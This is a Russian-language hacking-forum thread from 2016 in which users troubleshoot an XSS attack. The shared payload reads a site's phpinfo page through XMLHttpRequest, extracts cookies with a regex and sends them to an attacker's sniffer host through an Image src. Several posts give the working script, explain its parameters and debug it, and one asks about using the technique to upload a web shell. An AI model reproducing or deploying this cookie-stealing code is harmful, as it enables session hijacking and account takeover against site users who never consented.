ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.04.2016, 17:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Сообщение от t0ma5
t0ma5 said:
↑
такое может происходить если куки не распарсились, посмотри вывод phpinfo, там точно есть массив HTTP_COOKIE ? Есть массив
Сообщение от M_script
M_script said:
↑
Добавь в начале кода строку "window.onload = function() {", в конце "}". Также укажи протокол в ссылках "http://" или "https://" вместо "//", не все браузеры поддерживают.
Кроссдоменные запросы отправляться будут, получить ответ нельзя, но это и не нужно в данном случае. Протоколы указывал по разному, не хочет работать. . Не понимаю в чем проблемма.
В XSS вставляю скрипт в таком виде img= new Image();img.src=" http://bldfdfdd.125mb.com/22.js" . Может проблемма в src ? В таком виде браузер подгружает скрипт с хостинга, но он не исполняется .
|
|
|
|
11.04.2016, 17:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от M_script
M_script said:
↑
Кроссдоменные запросы отправляться будут, получить ответ нельзя, но это и не нужно в данном случае. В вики по-другому написано: " Cross-domain" AJAX requests are forbidden by default because of their ability to perform advanced requests (POST, PUT, DELETE and other types of HTTP requests, along with specifying custom HTTP headers) that introduce many cross-site scripting security issues. CORS defines a way in which a browser and server can interact to determine safely whether or not to allow the cross-origin request." И в общем-то логично, иначе какая это защита от хсс. Вот в этой статье, например: http://hayageek.com/cross-domain-ajax-request-jquery/ в серверных заголовках конкретно указываются, как методы/заголовки разрешены.
Сообщение от bazaWT
bazaWT said:
↑
Есть массив
Протоколы указывал по разному, не хочет работать. . Не понимаю в чем проблемма.
В XSS вставляю скрипт в таком виде img= new Image();img.src="
http://bldfdfdd.125mb.com/22.js
" . Может проблемма в src ? В таком виде браузер подгружает скрипт с хостинга, но он не исполняется . Протестируй у себя через хттп-прокси какой-нибудь и посмотрим, отправляются ли данные на самом деле через xmlhttprequest или нет.
|
|
|
|
11.04.2016, 17:52
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Это шутка? Почему картинка должна исполняться как скрипт?
Сообщение от blackbox
blackbox said:
↑
В вики по-другому написано: Произвольные заголовки запрещены. Обычный POST/GET с дефолтными заголовками отправляется.
Код:
Code:
var x = new XMLHttpRequest();
x.open('POST', 'http://anysite/', true);
x.send('param=value');
|
|
|
11.04.2016, 18:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Сообщение от M_script
M_script said:
↑
Это шутка? Почему картинка должна исполняться как скрипт?
code] Я по разному пробовал , src=" http://bdkldjf.125mb.com/22.js" так тоже. Но в ответах фаербага и фидлера нету записей что бы передавались данные через xmlhttprequest.
|
|
|
|
11.04.2016, 20:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Пояснения по этому коду
Сообщение от yarbabin
yarbabin said:
↑
надеюсь
@psihoz26
меня не покорает за его скрипт)
Код:
Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', '/$PARAM1', true);
xhr.send(null);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if(xhr.status == 200) {
(new Image()).src="$PARAM2"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
}
}
- локальная урла сайта, на котором xss и на котором ты можешь читать phpInfo: http://xss.com/some_path/php_info.php
$PARAM2 - сайт с твоим снифером, на который ты "как бы" обращаешься за картинкой и в параметрах запроса указываешь выдранные куки из ответа:
xhr.responseText - ответ с данными от phpInfo,
/_COOKIE.*? (.*?)/m - регулярка, которая выдёргивает куки из ответа.
В итоге именно этот скрипт с изменёнными под тебя $PARAM12 должен выполняться на стороне браузера. |
|
|
|
11.04.2016, 20:18
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от yarbabin
yarbabin said:
↑
надеюсь
@psihoz26
меня не покорает за его скрипт) Копирайтов еще не хватает, здесь же столько кода
|
|
|
|
11.04.2016, 20:19
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от bazaWT
bazaWT said:
↑
Я по разному пробовал , src="
http://bdkldjf.125mb.com/22.js
" так тоже. Но в ответах фаербага и фидлера нету записей что бы передавались данные через xmlhttprequest. на код просмотрите еще раз
|
|
|
|
12.04.2016, 03:29
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от bazaWT
bazaWT said:
↑
Я по разному пробовал , src="
http://bdkldjf.125mb.com/22.js
" так тоже. Но в ответах фаербага и фидлера нету записей что бы передавались данные через xmlhttprequest.
|
|
|
|
15.04.2016, 22:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Мужики подскажите, застопорился с этим скриптом . Он изымает куки с phphinfo , но только одну строчку . Гдето в регулярке проблема .
Код:
Code:
new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
Но не пойму где , пробовал без нее, чисто текст , так вобще не передается на снифер . |
|
|
|
17.04.2016, 03:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
55143
Репутация:
0
|
|
Из вышесказанного, получается даже можно шелл залить?(опред. cms), зная какой post запрос слать(загрузка файла в админке в дефолт директорию)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
